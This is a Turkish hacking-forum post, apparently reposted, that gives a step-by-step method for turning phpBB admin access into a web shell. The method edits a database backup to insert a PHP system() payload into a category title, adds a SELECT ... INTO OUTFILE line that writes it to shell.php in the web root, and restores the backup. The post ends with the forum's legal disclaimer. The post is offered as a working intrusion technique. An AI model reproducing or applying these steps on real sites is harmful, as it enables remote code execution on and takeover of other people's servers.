PhpBB'den Servera Girmek

spedohymer

Katılımcı Üye
15 Eki 2007
835
15
Network / Türkiye
Evet arkadaşlar bildiğiniz gibi phpbbde servera girilemiyor yani admin panelinden siteye upload vs.. yok ben size burada phpbb'den Servera girme yöntemini anlatıcam ilk önce sitede admin olup Admin paneline girmeniz gerekmektedir sonrada adres satırına www.siteadi.com/admin/admin_disallow.php?setmodules=00 Yazıp Database ile ilgili bölüme girmeniz gerekmektedir Buradan Db'yi Yedekleyip kendi bilgisayarımıza çekiyoruz ardından db nin içinde

Code: INSERT INTO phpbb_categories



diye aratıyoruz ve karşımıza aşşağıdaki şekilde bişey yazması lazım

Code: INSERT INTO phpbb_categories (cat_id, cat_TiTle, cat_order) VALUES('1', 'TEST Category', '10');



bunu

Code: INSERT INTO phpbb_categories (cat_id, cat_TiTle, cat_order) VALUES('1', '<? system("ls"); ?>', '10');



Bununla değiştiriyoruz ardından ise phpbb_categories 'in altına

Code: SELECT cat_TiTle INTO OUTFILE '/home/dizin/public_html/shell.php' FROM phpbb_categories where cat_id=1;



yazıyoruz burada /home/dizin/public_html/shell.php yerine sitenin serverdaki dizinini yazıyoruz ardından kaydetip tekrar admin paneline gidiyoruz ve Restore Db kısmından Db'mizi upload ediyoruz ve sonrada www.siteadi.com/shell.php şeklinde servera giriyoruz umarım anlatabilmişimdir

alıntıdır.

+++++rep+++​
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.